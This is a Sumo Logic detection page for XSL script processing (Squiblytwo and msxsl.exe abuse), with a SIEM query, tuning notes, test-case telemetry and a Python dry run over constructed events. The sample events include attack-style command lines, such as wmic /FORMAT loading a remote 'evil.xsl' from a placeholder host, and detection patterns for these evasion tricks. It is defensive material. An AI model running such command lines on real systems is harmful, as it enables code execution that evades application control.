T1220 Sumo Logic CSE · Sumo

Detect XSL Script Processing in Sumo Logic CSE

Adversaries may bypass application control and obscure code execution by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) stylesheets support embedded scripting (JScript, VBScript and other script languages) through extension elements such as msxsl:script, which the XSLT processor runs while applying the stylesheet. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which executes any script embedded in the local or remote XSL file it is asked to apply; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which loads the named stylesheet, local or remote, through WMI and runs the JScript or VBScript it contains. Both techniques proxy execution through signed Windows tooling and so evade application control solutions such as AppLocker. msxsl.exe is not installed by default, so adversaries typically drop it alongside their payloads; wmic.exe ships with Windows but is deprecated in recent releases, so a /FORMAT invocation that points at anything other than the built-in output formats deserves a look. Real-world usage includes Astaroth, Cobalt Group, and Higaisa.

MITRE ATT&CK

Tactic: Defense Evasion
Technique: T1220 XSL Script Processing
Canonical reference: https://attack.mitre.org/techniques/T1220/

Sumo Detection Query

Sumo Logic CSE (Sumo)
// Sumo Logic log-search syntax (scheduled search or hunting query). Field names assume the
// Windows events have already been parsed (json auto or a field extraction rule).
(_sourceCategory="windows/sysmon" OR _sourceCategory="windows/security")
// Sysmon Event ID 1 (process create) or Security 4688. 4688 carries CommandLine only when
// "Include command line in process creation events" is enabled in audit policy.
| where EventID = "1" OR EventCode = "1" OR EventID = "4688"
// 4688 names the binary NewProcessName rather than Image; fall back to it so both sources
// go through the same checks.
| if(isNull(Image), NewProcessName, Image) as image_path
| toLowerCase(image_path) as image_lower
| toLowerCase(CommandLine) as cmdline_lower
| where image_lower matches "*msxsl.exe" OR (image_lower matches "*wmic.exe" AND cmdline_lower matches "*/format*")
// Classify technique variant
| if(image_lower matches "*msxsl.exe", 1, 0) as is_msxsl
| if(image_lower matches "*wmic.exe" AND cmdline_lower matches "*/format*", 1, 0) as is_wmic_format
| if(cmdline_lower matches /.*(https?:\/\/|ftp:\/\/|\\\\).*/, 1, 0) as remote_load
// RE2 (the engine behind Sumo regex) has no backreferences, so instead of \1 capture the two
// positional arguments that follow msxsl and compare them.
| parse regex field=cmdline_lower "msxsl(?:\.exe)?\S*\s+(?<arg1>\S+)\s+(?<arg2>\S+)" nodrop
| if(isNull(arg1), 0, if(arg1 = arg2, 1, 0)) as same_file_arg
| if(cmdline_lower matches /.*\.(jpeg|jpg|png|gif|txt|dat|bin|log)(\s|"|$).*/, 1, 0) as arbitrary_ext
| if(cmdline_lower matches /.*\/format[:\s]+\S*\.xslt?.*/, 1, 0) as xsl_format
| if(is_msxsl = 1 AND remote_load = 1, "msxsl-remote-xsl",
    if(is_msxsl = 1 AND same_file_arg = 1, "msxsl-same-file",
    if(is_msxsl = 1 AND arbitrary_ext = 1, "msxsl-arbitrary-ext",
    if(is_msxsl = 1, "msxsl-local-xsl",
    if(is_wmic_format = 1 AND remote_load = 1, "squiblytwo-remote",
    if(is_wmic_format = 1, "squiblytwo-local", "unknown")))))) as technique_variant
| is_msxsl + remote_load + same_file_arg + arbitrary_ext + (is_wmic_format * xsl_format) as risk_score
// Non-aggregated results are returned newest first, so no sort is needed.
| fields _messagetime, Computer, User, image_path, CommandLine, ParentImage, ParentCommandLine, technique_variant, remote_load, same_file_arg, arbitrary_ext, risk_score

Severity: high. Confidence: high.

Sumo Logic query detecting T1220 XSL Script Processing. It selects Sysmon Event ID 1 and Windows Security 4688 process-creation events, keeps msxsl.exe executions and wmic.exe invocations that carry the /FORMAT switch, then tags each hit with a technique variant and an additive risk score (msxsl present, remote stylesheet source, the same filename passed twice, a non-.xsl extension, an explicit .xsl handed to wmic /FORMAT) for analyst triage. Two checks before deploying it: matching on the image name misses a renamed msxsl.exe, so pair it with Sysmon's OriginalFileName field (present since Sysmon 10) or a file hash where you have them; and wmic's built-in output keywords (/format:list, /format:csv, /format:htable and the rest) also satisfy the /FORMAT match, so expect those from administrative scripts and suppress them explicitly rather than lowering the rule's severity.

Data Sources

  • Windows Sysmon (Event ID 1, process creation)
  • Windows Security Event Log (Event ID 4688, process creation)
  • Sumo Logic Cloud SIEM Enterprise normalized process events

Required Tables

  • _sourceCategory=windows/sysmon
  • _sourceCategory=windows/security

False Positives & Tuning

  • Legitimate XSLT processing in document management or reporting pipelines that use msxsl.exe to transform XML data
  • IT operations scripts using wmic.exe /FORMAT for administrative reporting with standard WMI output stylesheets
  • Development or test environments where msxsl.exe is used as part of automated build and test XML transformation workflows

Testing Methodology

Validate this detection against the five test cases below, modelled on Atomic Red Team's T1220 tests. Each test lists the behaviour to exercise and the telemetry you should expect to see; check your Sysmon configuration first, because Image Load (Event ID 7), Network Connection (Event ID 3) and File Create (Event ID 11) events are only emitted for the images and paths the configuration includes. Executable commands and cleanup steps are available with Pro.

  1. Test 1: msxsl.exe Local XSL Script Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing test.xml and test.xsl. Sysmon Event ID 7: Image Load of jscript.dll by msxsl.exe, confirming the JScript engine started. Sysmon Event ID 1: child process whoami.exe with ParentImage msxsl.exe (launched from the stylesheet's script through WScript.Shell, so the parent is still msxsl.exe). Sysmon Event ID 11: File Create events for test.xml and test.xsl.

  2. Test 2: msxsl.exe Same-File Argument Evasion

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine showing the same filename appearing twice (e.g., 'selfref.xsl selfref.xsl'). Sysmon Event ID 7: Image Load for jscript.dll by msxsl.exe. Sysmon Event ID 11: File creation for selfref.xsl.

  3. Test 3: Squiblytwo, wmic /FORMAT Remote XSL Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and 'http://127.0.0.1:19823/evil.xsl'. Sysmon Event ID 3: Network Connection attempt from wmic.exe to 127.0.0.1:19823 (connection refused, but event is logged). Sysmon Event ID 22: DNS query if a hostname is used instead of IP.

  4. Test 4: Squiblytwo, wmic /FORMAT Local XSL File

    Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and the %TEMP% path to wmic_test.xsl. Sysmon Event ID 7: jscript.dll loaded by wmic.exe. Sysmon Event ID 11: File creation for wmic_test.xsl.

  5. Test 5: msxsl.exe Arbitrary Extension Masking

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing '.jpeg' file extensions instead of .xsl. Sysmon Event ID 7: jscript.dll loaded by msxsl.exe. Sysmon Event ID 11: File creation events for data.jpeg and style.jpeg.
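The following is a dry run of the detection logic from the query section over constructed process-create events, one per test case above plus two kinds of benign noise, so the expected technique_variant and risk_score for each test can be checked before the query is scheduled. It is an added Python example, not the page's query and not Sumo Logic or Atomic Red Team code. The events, host names and paths are constructed; the allowlist_parents hook and msbuild.exe as an expected parent of msxsl.exe are assumptions made for illustration; the suppression of wmic's documented built-in /format keywords is a tuning addition the query itself does not contain.

```python
import re
from typing import Optional

# Regexes mirror the query's checks and stay RE2-compatible (no backreferences): the
# "same file twice" test captures both positional msxsl arguments and compares them.
IMAGE_MSXSL = re.compile(r"msxsl\.exe$")
IMAGE_WMIC = re.compile(r"wmic\.exe$")
FORMAT_SWITCH = re.compile(r"/format")
REMOTE_LOAD = re.compile(r"https?://|ftp://|\\\\")  # URL or UNC (\\server\share) stylesheet
MSXSL_ARGS = re.compile(r"msxsl(?:\.exe)?\S*\s+(\S+)\s+(\S+)")
ARBITRARY_EXT = re.compile(r'\.(?:jpeg|jpg|png|gif|txt|dat|bin|log)(?:\s|"|$)')
XSL_FORMAT = re.compile(r"/format[:\s]+\S*\.xslt?")
# wmic's documented built-in output formats also satisfy "/format" and are the main benign
# source of hits; suppressing them is a tuning step, not part of the page's query.
BUILTIN_WMIC_FORMAT = re.compile(
    r'/format:"?(?:csv|hform|htable|list|mof|rawxml|table|textvaluelist|value|xml)"?(?:\s|$)')


def classify(event: dict, allowlist_parents: frozenset = frozenset()) -> Optional[dict]:
    """Return the query's output row for one process-create event, or None if it does not match.

    Sysmon EID 1 names the binary Image; Security 4688 names it NewProcessName (CommandLine is
    present in 4688 only when command-line auditing is enabled). allowlist_parents is an
    assumed tuning hook: parent image basenames whose msxsl/wmic children are expected.
    """
    image = (event.get("Image") or event.get("NewProcessName") or "").lower()
    cmd = (event.get("CommandLine") or "").lower()
    parent = (event.get("ParentImage") or event.get("ParentProcessName") or "").lower()

    is_msxsl = IMAGE_MSXSL.search(image) is not None
    is_wmic_format = IMAGE_WMIC.search(image) is not None and FORMAT_SWITCH.search(cmd) is not None
    if not (is_msxsl or is_wmic_format):
        return None

    remote_load = REMOTE_LOAD.search(cmd) is not None
    args = MSXSL_ARGS.search(cmd)
    same_file_arg = args is not None and args.group(1) == args.group(2)
    arbitrary_ext = ARBITRARY_EXT.search(cmd) is not None
    xsl_format = XSL_FORMAT.search(cmd) is not None

    if is_msxsl:  # same precedence as the query's nested if()
        if remote_load:
            variant = "msxsl-remote-xsl"
        elif same_file_arg:
            variant = "msxsl-same-file"
        elif arbitrary_ext:
            variant = "msxsl-arbitrary-ext"
        else:
            variant = "msxsl-local-xsl"
    else:
        variant = "squiblytwo-remote" if remote_load else "squiblytwo-local"

    risk_score = (int(is_msxsl) + int(remote_load) + int(same_file_arg)
                  + int(arbitrary_ext) + int(is_wmic_format and xsl_format))

    suppressed = None  # tuning: explain why a row would be dropped rather than silently dropping it
    if is_wmic_format and not remote_load and BUILTIN_WMIC_FORMAT.search(cmd):
        suppressed = "builtin wmic format keyword"
    elif parent.rsplit("\\", 1)[-1] in allowlist_parents:
        suppressed = "allowlisted parent image"

    return {
        "Computer": event.get("Computer"),
        "Image": image,
        "CommandLine": event.get("CommandLine"),
        "technique_variant": variant,
        "remote_load": int(remote_load),
        "same_file_arg": int(same_file_arg),
        "arbitrary_ext": int(arbitrary_ext),
        "risk_score": risk_score,
        "suppressed": suppressed,
    }


def run_detection(events, allowlist_parents: frozenset = frozenset()) -> list:
    """Apply classify() to a batch of events and keep the rows that matched."""
    rows = [classify(e, allowlist_parents) for e in events]
    return [r for r in rows if r is not None]


# Constructed sample telemetry (not captured from a real host): one event per test case
# above, then a built-in wmic format, an assumed build-pipeline use of msxsl, and an unrelated
# process. Host names and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventID": "1", "Computer": "WS01", "Image": r"C:\Tools\msxsl.exe",
     "CommandLine": r"msxsl.exe test.xml test.xsl", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "1", "Computer": "WS01", "Image": r"C:\Tools\msxsl.exe",
     "CommandLine": r'"C:\Tools\msxsl.exe" selfref.xsl selfref.xsl', "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "4688", "Computer": "WS02", "NewProcessName": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /FORMAT:"http://127.0.0.1:19823/evil.xsl"', "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "1", "Computer": "WS02", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic process get brief /FORMAT:"C:\Users\a\AppData\Local\Temp\wmic_test.xsl"', "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "1", "Computer": "WS01", "Image": r"C:\Tools\msxsl.exe",
     "CommandLine": r"msxsl.exe data.jpeg style.jpeg", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "1", "Computer": "SRV01", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic os get caption /format:list", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "1", "Computer": "BUILD01", "Image": r"C:\BuildTools\msxsl.exe",
     "CommandLine": r"msxsl.exe report.xml report.xsl -o report.html", "ParentImage": r"C:\Program Files\dotnet\msbuild.exe"},
    {"EventID": "1", "Computer": "WS01", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe style.xsl", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS, allowlist_parents=frozenset({"msbuild.exe"})):
        flag = f"  (suppressed: {row['suppressed']})" if row["suppressed"] else ""
        print(f"{row['risk_score']}  {row['technique_variant']:22}  {row['CommandLine']}{flag}")
```

Running it shows the five test cases landing on the variants and scores the query would assign (the remote Squiblytwo case scores 2 because remote_load and xsl_format both fire, the local one only 1), while the /format:list and build-server rows surface with a suppression reason instead of vanishing, which is the shape you want before turning the tuning into a where clause in the real query.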
